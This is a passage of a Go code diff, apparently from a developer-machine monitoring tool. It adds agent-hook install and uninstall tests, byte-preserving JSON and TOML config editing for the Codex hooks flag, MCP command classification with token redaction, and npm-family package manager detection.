present:\nbefore=%s\nafter=%s", original, after) + } + + if !strings.Contains(stdout.String(), "no DMG-owned") { + t.Errorf("stdout missing no-op note, got: %q", stdout.String()) + } +} + +func TestRunUninstall_ExplicitAgentSkipsDetection(t *testing.T) { + // Seed codex installed. + home, _ := runInstallForTest(t, "codex") + + withErrorLog(t) + withResolveBinary(t, okBinary) + + // Now use a fresh mock with EMPTY $PATH but --agent codex — + // uninstall must still target codex. + m := newInstallMock(t, home) + + var stdout, stderr bytes.Buffer + if rc := RunUninstall(context.Background(), m, "codex", &stdout, &stderr); rc != 0 { + t.Fatalf("uninstall rc=%d stderr=%q", rc, stderr.String()) + } + + hooks, err := os.ReadFile(filepath.Join(home, ".codex", "hooks.json")) + if err != nil { + t.Fatal(err) + } + if strings.Contains(string(hooks), fakeBinary+" _hook codex") { + t.Errorf("DMG codex hook still present: %s", string(hooks)) + } +} + +// TestRunUninstall_CodexLeavesFeatureFlag pins the invariant that +// uninstall removes hook entries from hooks.json but does NOT revert +// [features].codex_hooks=true in config.toml. Other tools' hooks may +// depend on that flag staying enabled. +func TestRunUninstall_CodexLeavesFeatureFlag(t *testing.T) { + home, m := runInstallForTest(t, "codex") + + withErrorLog(t) + withResolveBinary(t, okBinary) + + cfgPath := filepath.Join(home, ".codex", "config.toml") + beforeCfg, err := os.ReadFile(cfgPath) + if err != nil { + t.Fatal(err) + } + if !strings.Contains(string(beforeCfg), "codex_hooks") { + t.Fatalf("seed broken: install didn't set codex_hooks flag: %s", string(beforeCfg)) + } + + var stdout, stderr bytes.Buffer + if rc := RunUninstall(context.Background(), m, "", &stdout, &stderr); rc != 0 { + t.Fatalf("uninstall rc=%d stderr=%q", rc, stderr.String()) + } + + afterCfg, err := os.ReadFile(cfgPath) + if err != nil { + t.Fatalf("config.toml vanished after uninstall: %v", err) + } + if !bytes.Equal(beforeCfg, afterCfg) { + t.Errorf("config.toml mutated by uninstall:\nbefore=%s\nafter=%s", + string(beforeCfg), string(afterCfg)) + } + + // The feature-flag-residue note must be visible to the user so + // the residue isn't a silent surprise. + if !strings.Contains(stdout.String(), "feature flag left enabled") { + t.Errorf("stdout missing feature-flag residue note, got: %q", stdout.String()) + } +} + +// TestRunUninstall_NeverDeletesSettingsFile pins the invariant that +// even when uninstall removes every DMG-owned hook from a settings +// file that contains nothing else, the file itself must remain on +// disk. (The adapter is responsible for this; the test ensures it +// holds at the handler boundary.) +func TestRunUninstall_NeverDeletesSettingsFile(t *testing.T) { + home, m := runInstallForTest(t, "claude-code") + + withErrorLog(t) + withResolveBinary(t, okBinary) + + settings := filepath.Join(home, ".claude", "settings.json") + + var stdout, stderr bytes.Buffer + if rc := RunUninstall(context.Background(), m, "", &stdout, &stderr); rc != 0 { + t.Fatalf("uninstall rc=%d stderr=%q", rc, stderr.String()) + } + if _, err := os.Stat(settings); err != nil { + t.Fatalf("settings file deleted: %v", err) + } +} diff --git a/internal/aiagents/configedit/json.go b/internal/aiagents/configedit/json.go new file mode 100644 index 0000000..62dea04 --- /dev/null +++ b/internal/aiagents/configedit/json.go @@ -0,0 +1,106 @@ +// Package configedit provides byte-preserving edits of user-owned +// JSON and TOML settings files. Standard encoding/json round-trips +// rewrite key order, drop comments (TOML), and renormalize whitespace. +// configedit performs path-targeted edits backed by tidwall/gjson and +// tidwall/sjson for JSON, plus a narrow regex+mask patcher for the +// codex_hooks TOML feature flag. +// +// Scope is intentionally narrow: only what the claudecode and codex +// adapters need. +package configedit + +import ( + "bytes" + "encoding/json" + "fmt" + "strings" + + "github.com/tidwall/gjson" + "github.com/tidwall/sjson" +) + +// NormalizeJSONObject returns the input bytes if they parse as a JSON +// object. Empty/whitespace-only input is treated as `{}`. Any other +// shape (array, scalar, malformed) is rejected. +func NormalizeJSONObject(data []byte) ([]byte, error) { + if len(bytes.TrimSpace(data)) == 0 { + return []byte(`{}`), nil + } + if !gjson.ValidBytes(data) { + return nil, fmt.Errorf("configedit: invalid JSON") + } + if !gjson.ParseBytes(data).IsObject() { + return nil, fmt.Errorf("configedit: root JSON value must be an object") + } + return data, nil +} + +// EscapePathKey escapes characters that have special meaning in +// gjson/sjson path syntax so a literal key like "first.name" can be +// used as a single path component. +func EscapePathKey(key string) string { + var b strings.Builder + b.Grow(len(key)) + for i := 0; i < len(key); i++ { + c := key[i] + switch c { + case '\\', '.', '*', '?': + b.WriteByte('\\') + } + b.WriteByte(c) + } + return b.String() +} + +// Path joins parts into a gjson/sjson path, escaping each part. +func Path(parts ...string) string { + escaped := make([]string, len(parts)) + for i, p := range parts { + escaped[i] = EscapePathKey(p) + } + return strings.Join(escaped, ".") +} + +// SetRaw sets the value at path to raw via sjson and validates the +// result is still well-formed JSON. +func SetRaw(data []byte, path string, raw string) ([]byte, error) { + out, err := sjson.SetRawBytes(data, path, []byte(raw)) + if err != nil { + return nil, fmt.Errorf("configedit: sjson set: %w", err) + } + if !json.Valid(out) { + return nil, fmt.Errorf("configedit: sjson produced invalid JSON") + } + return out, nil +} + +// Delete removes the value at path via sjson and validates the result. +func Delete(data []byte, path string) ([]byte, error) { + out, err := sjson.DeleteBytes(data, path) + if err != nil { + return nil, fmt.Errorf("configedit: sjson delete: %w", err) + } + if !json.Valid(out) { + return nil, fmt.Errorf("configedit: sjson produced invalid JSON") + } + return out, nil +} + +// RawArray joins already-valid raw JSON elements into a JSON array +// literal. Empty input yields `[]`. +func RawArray(items []string) string { + if len(items) == 0 { + return `[]` + } + return `[` + strings.Join(items, `,`) + `]` +} + +// MarshalRawJSON marshals v to a compact raw JSON string suitable for +// passing to SetRaw / RawArray. +func MarshalRawJSON(v any) (string, error) { + b, err := json.Marshal(v) + if err != nil { + return "", err + } + return string(b), nil +} diff --git a/internal/aiagents/configedit/json_test.go b/internal/aiagents/configedit/json_test.go new file mode 100644 index 0000000..00fd52c --- /dev/null +++ b/internal/aiagents/configedit/json_test.go @@ -0,0 +1,118 @@ +package configedit + +import ( + "strings" + "testing" +) + +func TestNormalizeJSONObjectAcceptsEmpty(t *testing.T) { + out, err := NormalizeJSONObject(nil) + if err != nil { + t.Fatal(err) + } + if string(out) != `{}` { + t.Errorf("empty input should normalize to {}; got %q", out) + } + out, err = NormalizeJSONObject([]byte(" \n\t ")) + if err != nil { + t.Fatal(err) + } + if string(out) != `{}` { + t.Errorf("whitespace input should normalize to {}; got %q", out) + } +} + +func TestNormalizeJSONObjectRejectsNonObject(t *testing.T) { + if _, err := NormalizeJSONObject([]byte(`[]`)); err == nil { + t.Error("array root must be rejected") + } + if _, err := NormalizeJSONObject([]byte(`"x"`)); err == nil { + t.Error("scalar root must be rejected") + } + if _, err := NormalizeJSONObject([]byte(`{not json`)); err == nil { + t.Error("malformed JSON must be rejected") + } +} + +func TestNormalizeJSONObjectPassesObjectThrough(t *testing.T) { + in := []byte(`{"theme":"dark"}`) + out, err := NormalizeJSONObject(in) + if err != nil { + t.Fatal(err) + } + if string(out) != string(in) { + t.Errorf("object input should pass through unchanged; got %q", out) + } +} + +func TestEscapePathKeyEscapesSpecials(t *testing.T) { + cases := map[string]string{ + "PreToolUse": "PreToolUse", + "first.name": `first\.name`, + `back\slash`: `back\\slash`, + "star*?": `star\*\?`, + "": "", + "plain_key-1": "plain_key-1", + } + for in, want := range cases { + if got := EscapePathKey(in); got != want { + t.Errorf("EscapePathKey(%q) = %q; want %q", in, got, want) + } + } +} + +func TestPathJoinsAndEscapes(t *testing.T) { + got := Path("hooks", "Pre.Tool") + want := `hooks.Pre\.Tool` + if got != want { + t.Errorf("Path = %q; want %q", got, want) + } +} + +func TestSetRawPreservesUnrelatedRootBytes(t *testing.T) { + in := []byte("{\n\t\"theme\": \"dark\" ,\n\t\"hooks\": {}\n}") + out, err := SetRaw(in, Path("hooks", "PreToolUse"), `[]`) + if err != nil { + t.Fatal(err) + } + if !strings.Contains(string(out), "\t\"theme\": \"dark\" ,") { + t.Fatalf("unrelated root bytes changed:\n%s", out) + } +} + +func TestDeletePreservesTrailingNewlineState(t *testing.T) { + in := []byte(`{"hooks":{"PreToolUse":[]},"theme":"dark"}`) + out, err := Delete(in, Path("hooks", "PreToolUse")) + if err != nil { + t.Fatal(err) + } + if len(out) > 0 && out[len(out)-1] == '\n' { + t.Fatalf("Delete must not add a final newline: %q", out) + } +} + +func TestRawArrayJoinsRawItems(t *testing.T) { + if got := RawArray(nil); got != `[]` { + t.Errorf("RawArray(nil) = %q; want []", got) + } + got := RawArray([]string{`{"a":1}`, `{"b":2}`}) + want := `[{"a":1},{"b":2}]` + if got != want { + t.Errorf("RawArray = %q; want %q", got, want) + } +} + +func TestMarshalRawJSONStruct(t *testing.T) { + v := struct { + Type string `json:"type"` + Command string `json:"command"` + }{Type: "command", Command: "stepsecurity-dev-machine-guard _hook claude-code PreToolUse"} + got, err := MarshalRawJSON(v) + if err != nil { + t.Fatal(err) + } + want := `{"type":"command","command":"stepsecurity-dev-machine-guard _hook claude-code PreToolUse"}` + if got != want { + t.Errorf("MarshalRawJSON = %q; want %q", got, want) + } +} diff --git a/internal/aiagents/configedit/toml.go b/internal/aiagents/configedit/toml.go new file mode 100644 index 0000000..e9f4010 --- /dev/null +++ b/internal/aiagents/configedit/toml.go @@ -0,0 +1,212 @@ +package configedit + +import ( + "bytes" + "fmt" + "regexp" + + toml "github.com/pelletier/go-toml/v2" +) + +// EnsureCodexHooksFlag returns the input bytes with `[features].codex_hooks +// = true` ensured. All bytes outside the touched line/section are +// preserved exactly. The boolean is true when the input changed. +// +// Behavior: +// - If `codex_hooks = true` already exists under [features], no change. +// - If `codex_hooks = false` exists under [features], only the value +// token is rewritten to `true`. +// - If [features] exists without the key, `codex_hooks = true` is +// inserted on its own line immediately after the table header. +// - If [features] does not exist, a new `[features]` table is appended +// at the end of the file with `codex_hooks = true`. +// +// Multi-line strings (`"""..."""`, `'''...'''`) and comments are masked +// before pattern matching so that user content cannot trick the +// scanner into treating the literal text `[features]` or `codex_hooks = +// true` inside a string as a real table header or key. +// +// The patched output is validated by go-toml/v2 before return; if the +// rewrite produces invalid TOML the original bytes are returned with +// an error so the caller can abort the install with the file untouched. +func EnsureCodexHooksFlag(data []byte) ([]byte, bool, error) { + masked := maskNonStructural(data) + start, end, headerEnd := findFeaturesSection(masked) + + var ( + out []byte + changed bool + ) + if start < 0 { + // Append a new [features] table at end of file. + var b bytes.Buffer + b.Write(data) + if len(data) > 0 && data[len(data)-1] != '\n' { + b.WriteByte('\n') + } + if len(data) > 0 { + b.WriteByte('\n') + } + b.WriteString("[features]\ncodex_hooks = true\n") + out, changed = b.Bytes(), true + } else if loc := codexHooksLineRE.FindSubmatchIndex(masked[start:end]); loc != nil { + valStart := start + loc[4] + valEnd := start + loc[5] + if string(data[valStart:valEnd]) == "true" { + return data, false, nil + } + var b bytes.Buffer + b.Write(data[:valStart]) + b.WriteString("true") + b.Write(data[valEnd:]) + out, changed = b.Bytes(), true + } else { + // Insert codex_hooks = true immediately after the [features] header line. + var b bytes.Buffer + b.Write(data[:headerEnd]) + b.WriteString("codex_hooks = true\n") + b.Write(data[headerEnd:]) + out, changed = b.Bytes(), true + } + + if changed { + probe := map[string]any{} + if err := toml.Unmarshal(out, &probe); err != nil { + return data, false, fmt.Errorf("configedit: patched TOML is invalid: %w", err) + } + } + return out, changed, nil +} + +// CodexHooksEnabled reports whether the bytes contain +// `[features].codex_hooks = true`. Multi-line strings and comments are +// masked so a literal containing the same text in a docstring is not +// misread as the real flag. +func CodexHooksEnabled(data []byte) bool { + masked := maskNonStructural(data) + start, end, _ := findFeaturesSection(masked) + if start < 0 { + return false + } + loc := codexHooksLineRE.FindSubmatchIndex(masked[start:end]) + if loc == nil { + return false + } + return string(data[start+loc[4]:start+loc[5]]) == "true" +} + +var ( + featuresHeaderRE = regexp.MustCompile(`(?m)^[ \t]*\[[ \t]*features[ \t]*\][ \t]*(#.*)?$`) + anyHeaderRE = regexp.MustCompile(`(?m)^[ \t]*\[\[?[^\]\n]+\]\]?[ \t]*(#.*)?$`) + codexHooksLineRE = regexp.MustCompile(`(?m)^([ \t]*codex_hooks[ \t]*=[ \t]*)(true|false)([ \t]*(?:#.*)?)$`) +) + +// findFeaturesSection scans masked TOML bytes and returns: +// - start: byte offset of the `[features]` header line, or -1 if absent. +// - end: byte offset of the byte AFTER the section. +// - headerEnd: byte offset right after the newline that terminates the +// `[features]` header line (so callers can splice in a new key +// directly after the header). +// +// masked must be the output of maskNonStructural so multi-line strings +// and comments cannot match the regexes. +func findFeaturesSection(masked []byte) (start, end, headerEnd int) { + loc := featuresHeaderRE.FindIndex(masked) + if loc == nil { + return -1, len(masked), -1 + } + start = loc[0] + headerEnd = loc[1] + if headerEnd < len(masked) && masked[headerEnd] == '\n' { + headerEnd++ + } + rest := masked[headerEnd:] + if next := anyHeaderRE.FindIndex(rest); next != nil { + return start, headerEnd + next[0], headerEnd + } + return start, len(masked), headerEnd +} + +// maskNonStructural returns a copy of data with every byte that is part +// of a comment or a string literal (including triple-quoted multi-line +// strings) replaced with a space, EXCEPT newline bytes which are kept so +// `(?m)` line anchors still work. Structural bytes (whitespace, +// brackets, bare keys, equals, true/false/numbers) are preserved. +// +// This is not a full TOML parser; it is just enough to keep our two +// regexes honest. Triple-quoted strings, single-line basic and literal +// strings, comments, and escape sequences in basic strings are +// recognized; everything else is treated as structural. +func maskNonStructural(data []byte) []byte { + out := make([]byte, len(data)) + copy(out, data) + pos := 0 + for pos < len(data) { + switch data[pos] { + case '#': + for pos < len(data) && data[pos] != '\n' { + out[pos] = ' ' + pos++ + } + case '"': + if pos+3 <= len(data) && data[pos+1] == '"' && data[pos+2] == '"' { + pos = maskMultilineString(data, out, pos, []byte(`"""`)) + } else { + pos = maskSingleString(data, out, pos, '"', true) + } + case '\'': + if pos+3 <= len(data) && data[pos+1] == '\'' && data[pos+2] == '\'' { + pos = maskMultilineString(data, out, pos, []byte(`'''`)) + } else { + pos = maskSingleString(data, out, pos, '\'', false) + } + default: + pos++ + } + } + return out +} + +func maskMultilineString(data, out []byte, pos int, delim []byte) int { + out[pos] = ' ' + out[pos+1] = ' ' + out[pos+2] = ' ' + pos += 3 + for pos < len(data) { + if pos+3 <= len(data) && data[pos] == delim[0] && data[pos+1] == delim[1] && data[pos+2] == delim[2] { + out[pos] = ' ' + out[pos+1] = ' ' + out[pos+2] = ' ' + return pos + 3 + } + if data[pos] != '\n' { + out[pos] = ' ' + } + pos++ + } + return pos +} + +func maskSingleString(data, out []byte, pos int, quote byte, allowEscape bool) int { + out[pos] = ' ' + pos++ + for pos < len(data) { + if data[pos] == '\n' { + // Unterminated string; leave the newline structural. Bail. + return pos + } + if allowEscape && data[pos] == '\\' && pos+1 < len(data) { + out[pos] = ' ' + out[pos+1] = ' ' + pos += 2 + continue + } + if data[pos] == quote { + out[pos] = ' ' + return pos + 1 + } + out[pos] = ' ' + pos++ + } + return pos +} diff --git a/internal/aiagents/configedit/toml_test.go b/internal/aiagents/configedit/toml_test.go new file mode 100644 index 0000000..1caaa9e --- /dev/null +++ b/internal/aiagents/configedit/toml_test.go @@ -0,0 +1,215 @@ +package configedit + +import ( + "strings" + "testing" + + toml "github.com/pelletier/go-toml/v2" +) + +func TestEnsureCodexHooksFlagAppendsWhenAbsent(t *testing.T) { + in := []byte(`model = "gpt-5" +`) + out, changed, err := EnsureCodexHooksFlag(in) + if err != nil { + t.Fatal(err) + } + if !changed { + t.Errorf("expected changed=true") + } + s := string(out) + if !strings.Contains(s, "[features]") { + t.Errorf("missing [features]: %s", s) + } + if !strings.Contains(s, "codex_hooks = true") { + t.Errorf("missing codex_hooks: %s", s) + } + // Original line preserved. + if !strings.HasPrefix(s, `model = "gpt-5"`) { + t.Errorf("unrelated content lost: %s", s) + } + // Validates as TOML. + var probe map[string]any + if err := toml.Unmarshal(out, &probe); err != nil { + t.Errorf("invalid TOML: %v", err) + } +} + +func TestEnsureCodexHooksFlagInsertsIntoExistingFeatures(t *testing.T) { + in := []byte(`model = "gpt-5" +[features] +other_flag = true +`) + out, changed, err := EnsureCodexHooksFlag(in) + if err != nil { + t.Fatal(err) + } + if !changed { + t.Errorf("expected changed=true") + } + s := string(out) + if !strings.Contains(s, "codex_hooks = true") { + t.Errorf("missing codex_hooks: %s", s) + } + // Original keys still present and order preserved. + if !strings.Contains(s, "other_flag = true") { + t.Errorf("unrelated key lost: %s", s) + } + if !strings.Contains(s, `model = "gpt-5"`) { + t.Errorf("unrelated table lost: %s", s) + } +} + +func TestEnsureCodexHooksFlagFlipsFalseToTrue(t *testing.T) { + in := []byte(`[features] +codex_hooks = false +`) + out, changed, err := EnsureCodexHooksFlag(in) + if err != nil { + t.Fatal(err) + } + if !changed { + t.Errorf("expected changed=true") + } + if !strings.Contains(string(out), "codex_hooks = true") { + t.Errorf("flag not flipped: %s", out) + } + if strings.Contains(string(out), "codex_hooks = false") { + t.Errorf("old false value still present: %s", out) + } +} + +func TestEnsureCodexHooksFlagNoOpWhenTrue(t *testing.T) { + in := []byte(`[features] +codex_hooks = true +other = false +`) + out, changed, err := EnsureCodexHooksFlag(in) + if err != nil { + t.Fatal(err) + } + if changed { + t.Errorf("expected changed=false") + } + if string(out) != string(in) { + t.Errorf("bytes changed despite no-op:\n in %s\n out %s", in, out) + } +} + +func TestEnsureCodexHooksFlagPreservesCommentsAndAdjacentTables(t *testing.T) { + in := []byte(`# user header comment +model = "gpt-5" + +[features] +# upstream comment +sandbox = "workspace-write" + +[telemetry] +enabled = true +`) + out, changed, err := EnsureCodexHooksFlag(in) + if err != nil { + t.Fatal(err) + } + if !changed { + t.Errorf("expected changed=true") + } + s := string(out) + for _, want := range []string{ + "# user header comment", + `model = "gpt-5"`, + "# upstream comment", + `sandbox = "workspace-write"`, + "[telemetry]", + "enabled = true", + "codex_hooks = true", + } { + if !strings.Contains(s, want) { + t.Errorf("expected output to contain %q; got %s", want, s) + } + } + // codex_hooks must land in [features], not [telemetry]. + featStart := strings.Index(s, "[features]") + telStart := strings.Index(s, "[telemetry]") + codexAt := strings.Index(s, "codex_hooks") + if !(featStart < codexAt && codexAt < telStart) { + t.Errorf("codex_hooks landed outside [features]: %s", s) + } +} + +func TestEnsureCodexHooksFlagIgnoresLiteralsInsideMultilineStrings(t *testing.T) { + // The literal text `[features]` and `codex_hooks = true` appear + // inside a triple-quoted string. The patcher must NOT treat them as + // real TOML structure, and must still append a real [features] table. + in := []byte("docstring = \"\"\"\n[features]\ncodex_hooks = true\n\"\"\"\n") + out, changed, err := EnsureCodexHooksFlag(in) + if err != nil { + t.Fatal(err) + } + if !changed { + t.Errorf("expected changed=true; multiline-string content must not be treated as real flag") + } + // Output must still contain the docstring intact and a NEW real + // [features] table at the end. + s := string(out) + if !strings.Contains(s, "docstring = \"\"\"\n[features]\ncodex_hooks = true\n\"\"\"") { + t.Errorf("docstring corrupted: %s", s) + } + if !strings.HasSuffix(s, "[features]\ncodex_hooks = true\n") { + t.Errorf("real [features] table not appended: %s", s) + } + // Validates as TOML. + var probe map[string]any + if err := toml.Unmarshal(out, &probe); err != nil { + t.Errorf("invalid TOML: %v", err) + } +} + +func TestCodexHooksEnabledIgnoresLiteralsInsideStrings(t *testing.T) { + // The flag appears inside a literal multiline string, NOT as a real + // key. CodexHooksEnabled must report false. + in := []byte("docstring = \"\"\"\n[features]\ncodex_hooks = true\n\"\"\"\n") + if CodexHooksEnabled(in) { + t.Errorf("multiline string content must not be detected as enabled flag") + } +} + +func TestEnsureCodexHooksFlagRejectsPatchProducingInvalidTOML(t *testing.T) { + // Sanity check: malformed input that would produce a still-malformed + // output should error out (the patched bytes get validated). We can't + // easily synthesize a case where our own patch breaks valid input, so + // just check that obviously-broken input is reported. + in := []byte("[features\nbroken") + _, _, err := EnsureCodexHooksFlag(in) + if err == nil { + t.Errorf("expected error on malformed TOML input") + } +} + +func TestCodexHooksEnabledIgnoresCommentedFlag(t *testing.T) { + in := []byte("# [features]\n# codex_hooks = true\n") + if CodexHooksEnabled(in) { + t.Fatal("commented flag must not count as enabled") + } +} + +func TestCodexHooksEnabled(t *testing.T) { + cases := []struct { + name string + in string + want bool + }{ + {"absent", `model = "gpt-5"`, false}, + {"missing key", "[features]\nother = true\n", false}, + {"false", "[features]\ncodex_hooks = false\n", false}, + {"true", "[features]\ncodex_hooks = true\n", true}, + {"true with comment", "[features]\ncodex_hooks = true # on\n", true}, + } + for _, tc := range cases { + t.Run(tc.name, func(t *testing.T) { + if got := CodexHooksEnabled([]byte(tc.in)); got != tc.want { + t.Errorf("got %v, want %v", got, tc.want) + } + }) + } +} diff --git a/internal/aiagents/doc.go b/internal/aiagents/doc.go new file mode 100644 index 0000000..bf0db7d --- /dev/null +++ b/internal/aiagents/doc.go @@ -0,0 +1,8 @@ +// Package aiagents is the root of the AI coding agent hooks domain. +// +// Subpackages own hook install/uninstall flows, the hidden runtime invoked +// by agents on each hook event, policy evaluation, telemetry upload, and +// the per-agent adapters (Claude Code, Codex). The policy evaluator +// currently runs audit-mode only and never returns a block decision to +// the agent. +package aiagents diff --git a/internal/aiagents/enrich/mcp/classify.go b/internal/aiagents/enrich/mcp/classify.go new file mode 100644 index 0000000..3a30b3a --- /dev/null +++ b/internal/aiagents/enrich/mcp/classify.go @@ -0,0 +1,91 @@ +// Package mcp classifies MCP-related shell-launched activity. +// +// Direct mcp____ tool events, MCP permission events, and +// Elicitation hooks already carry the server identity in top-level +// fields or the payload — no enrichment is produced for them. This +// package exists for the one case where the MCP signal is hidden +// inside a Bash command (e.g. `npx -y @modelcontextprotocol/server-foo` +// or `claude mcp ...`). +package mcp + +import ( + "context" + "errors" + "strings" + + "github.com/step-security/dev-machine-guard/internal/aiagents/event" + "github.com/step-security/dev-machine-guard/internal/aiagents/redact" +) + +// serverCommandCap bounds the redacted command snippet copied into +// MCPInfo.ServerCommand. The full command also lives on +// Enrichments.Shell.Command; this is a tighter projection for MCP +// joins, not a duplicate transport. +const serverCommandCap = 512 + +// ClassifyShell inspects a shell command for MCP-related invocations +// (e.g. `claude mcp ...`, `npx -y @modelcontextprotocol/server-foo`). +// Returns nil when no MCP signal is found. +// +// Branches are ordered so the most specific signal wins: `claude mcp` +// is checked before the generic `mcp` subcommand token, and the +// @modelcontextprotocol/ package before either. +func ClassifyShell(ctx context.Context, cmd string) (*event.MCPInfo, bool) { + if isCtxCanceled(ctx) { + return nil, true + } + lower := strings.ToLower(cmd) + switch { + case strings.Contains(lower, "@modelcontextprotocol/"): + info := &event.MCPInfo{ + Kind: "local", + ServerCommand: redactedSnippet(cmd), + } + if name := extractMCPServerName(lower); name != "" { + info.ServerName = name + } + return info, false + case strings.Contains(lower, "claude mcp"): + return &event.MCPInfo{ + Kind: "unknown", + ServerCommand: redactedSnippet(cmd), + }, false + case strings.Contains(lower, " mcp ") || strings.HasPrefix(lower, "mcp "): + return &event.MCPInfo{ + Kind: "unknown", + ServerCommand: redactedSnippet(cmd), + }, false + } + return nil, false +} + +func extractMCPServerName(cmd string) string { + const marker = "@modelcontextprotocol/" + _, rest, ok := strings.Cut(cmd, marker) + if !ok { + return "" + } + for i, r := range rest { + if r == ' ' || r == '\t' || r == '@' || r == ',' { + return rest[:i] + } + } + return rest +} + +func redactedSnippet(cmd string) string { + s := redact.String(cmd) + if len(s) > serverCommandCap { + return s[:serverCommandCap] + } + return s +} + +func isCtxCanceled(ctx context.Context) bool { + select { + case <-ctx.Done(): + return errors.Is(ctx.Err(), context.DeadlineExceeded) + default: + return false + } +} diff --git a/internal/aiagents/enrich/mcp/classify_test.go b/internal/aiagents/enrich/mcp/classify_test.go new file mode 100644 index 0000000..28e7807 --- /dev/null +++ b/internal/aiagents/enrich/mcp/classify_test.go @@ -0,0 +1,65 @@ +package mcp + +import ( + "context" + "strings" + "testing" +) + +func TestClassifyShellMCPPackageIsLocal(t *testing.T) { + info, _ := ClassifyShell(context.Background(), "npx -y @modelcontextprotocol/server-filesystem /tmp") + if info == nil { + t.Fatalf("expected detection") + } + if info.ServerName != "server-filesystem" { + t.Errorf("server: %q", info.ServerName) + } + if info.Kind != "local" { + t.Errorf("kind: %q", info.Kind) + } + if info.ServerCommand == "" { + t.Errorf("expected redacted server_command snippet") + } +} + +func TestClassifyShellNonMCP(t *testing.T) { + info, _ := ClassifyShell(context.Background(), "npm install lodash") + if info != nil { + t.Fatalf("expected nil, got %+v", info) + } +} + +// `claude mcp list` must be classified by the Claude-specific rule, not +// the generic ` mcp ` rule that would otherwise win on substring order. +// Both currently produce the same shape, but the ordering preserves +// future room to differentiate. +func TestClassifyShellClaudeMCPDetected(t *testing.T) { + info, _ := ClassifyShell(context.Background(), "claude mcp list") + if info == nil { + t.Fatalf("expected detection") + } + if info.Kind != "unknown" { + t.Errorf("kind: %q", info.Kind) + } +} + +// Bare `mcp ...` falls through to the generic rule but stays detected. +func TestClassifyShellGenericMCPDetected(t *testing.T) { + info, _ := ClassifyShell(context.Background(), "mcp foo") + if info == nil { + t.Fatalf("expected detection") + } +} + +// ServerCommand must be redacted before storage so a token in a +// pre-command env assignment never lands on disk. +func TestClassifyShellRedactsServerCommand(t *testing.T) { + cmd := "GITHUB_TOKEN=ghp_aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa npx -y @modelcontextprotocol/server-github" + info, _ := ClassifyShell(context.Background(), cmd) + if info == nil { + t.Fatalf("expected detection") + } + if strings.Contains(info.ServerCommand, "ghp_aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") { + t.Errorf("server_command not redacted: %q", info.ServerCommand) + } +} diff --git a/internal/aiagents/enrich/npm/detect.go b/internal/aiagents/enrich/npm/detect.go new file mode 100644 index 0000000..f8be654 --- /dev/null +++ b/internal/aiagents/enrich/npm/detect.go @@ -0,0 +1,126 @@ +// Package npm classifies and enriches npm-ecosystem package manager activity +// observed in shell commands. Detection is pure; enrichment may shell out to +// npm/pnpm/yarn/bun under a caller-provided context. +package npm + +import ( + "strings" + + "github.com/google/shlex" + "github.com/step-security/dev-machine-guard/internal/aiagents/event" +) + +// Manager identifies a supported package manager. +type Manager string + +const ( + NPM Manager = "npm" + NPX Manager = "npx" + PNPM Manager = "pnpm" + Yarn Manager = "yarn" + Bun Manager = "bun" +) + +// Detection summarizes which manager and command kind were detected. +type Detection struct { + Manager Manager + CommandKind string // install | uninstall | exec | publish | other + Args []string +} + +// Detect parses cmd and returns the package-manager classification, or nil. +func Detect(cmd string) *Detection { + tokens, err := shlex.Split(cmd) + if err != nil || len(tokens) == 0 { + // Fall back to whitespace split; shlex fails on unbalanced quotes. + tokens = strings.Fields(cmd) + if len(tokens) == 0 { + return nil + } + } + for len(tokens) > 0 && (strings.Contains(tokens[0], "=") || tokens[0] == "env") { + tokens = tokens[1:] + } + if len(tokens) == 0 { + return nil + } + bin := tokens[0] + if idx := strings.LastIndexByte(bin, '/'); idx >= 0 { + bin = bin[idx+1:] + } + mgr, ok := managerFromBinary(bin) + if !ok { + return nil + } + args := tokens[1:] + return &Detection{ + Manager: mgr, + CommandKind: classifyKind(mgr, args), + Args: args, + } +} + +func managerFromBinary(bin string) (Manager, bool) { + switch bin { + case "npm": + return NPM, true + case "npx": + return NPX, true + case "pnpm", "pnpx": + return PNPM, true + case "yarn": + return Yarn, true + case "bun", "bunx": + return Bun, true + } + return "", false +} + +func classifyKind(mgr Manager, args []string) string { + var sub string + for _, a := range args { + if strings.HasPrefix(a, "-") { + continue + } + sub = strings.ToLower(a) + break + } + if sub == "" { + switch mgr { + case PNPM, Yarn, Bun: + return "install" + } + return "other" + } + switch sub { + case "i", "install", "ci", "add": + return "install" + case "uninstall", "remove", "rm", "un": + return "uninstall" + case "exec", "run", "x", "dlx": + return "exec" + case "publish": + return "publish" + case "audit": + return "audit" + } + if mgr == NPX || mgr == Bun { + return "exec" + } + return "other" +} + +func confidence(m Manager) string { + switch m { + case NPM, NPX: + return "high" + case PNPM, Yarn: + return "medium" + case Bun: + return "low" + } + return "low" +} + +// EnrichResult is a thin alias used by the hook runtime. +type EnrichResult = event.PackageManagerInfo diff --git a/internal/aiagents/enrich/npm/detect_test.go b/internal/aiagents/enrich/npm/detect_test.go new file mode 100644 index 0000000..c90ff79 --- /dev/null +++ b/internal/aiagents/enrich/npm/detect_test.go @@ -0,0 +1,58 @@ +package npm + +import "testing" + +func TestDetect(t *testing.T) { + cases := []struct { + cmd string + want Manager + kind string + }{ + {"npm install lodash", NPM, "install"}, + {"npm i", NPM, "install"}, + {"npm uninstall lodash", NPM, "uninstall"}, + {"npm publish", NPM, "publish"}, + {"npm audit", NPM, "audit"}, + {"npx -y create-vite my-app", NPX, "exec"}, + {"pnpm add react", PNPM, "install"}, + {"pnpm remove react", PNPM, "uninstall"}, + {"pnpm", PNPM, "install"}, + {"yarn add lodash", Yarn, "install"}, + {"yarn", Yarn, "install"}, + {"bun add zod", Bun, "install"}, + {"bunx prisma generate", Bun, "exec"}, + {"/usr/local/bin/npm install", NPM, "install"}, + {"FOO=bar npm install lodash", NPM, "install"}, + } + for _, tc := range cases { + t.Run(tc.cmd, func(t *testing.T) { + d := Detect(tc.cmd) + if d == nil { + t.Fatalf("expected detection for %q", tc.cmd) + } + if d.Manager != tc.want { + t.Fatalf("manager: got %s want %s", d.Manager, tc.want) + } + if d.CommandKind != tc.kind { + t.Fatalf("kind: got %s want %s", d.CommandKind, tc.kind) + } + }) + } +} + +func TestDetectIgnoresUnrelatedCommands(t *testing.T) { + for _, cmd := range []string{"git push", "cargo build", "ls", "echo hi", ""} { + if d := Detect(cmd); d != nil { + t.Errorf("expected nil for %q, got %+v", cmd, d) + } + } +} + +func TestConfidenceLabels(t *testing.T) { + if got := confidence(NPM); got != "high" { + t.Errorf("npm confidence: %s", got) + } + if got := confidence(Bun); got != "low" { + t.Errorf("bun 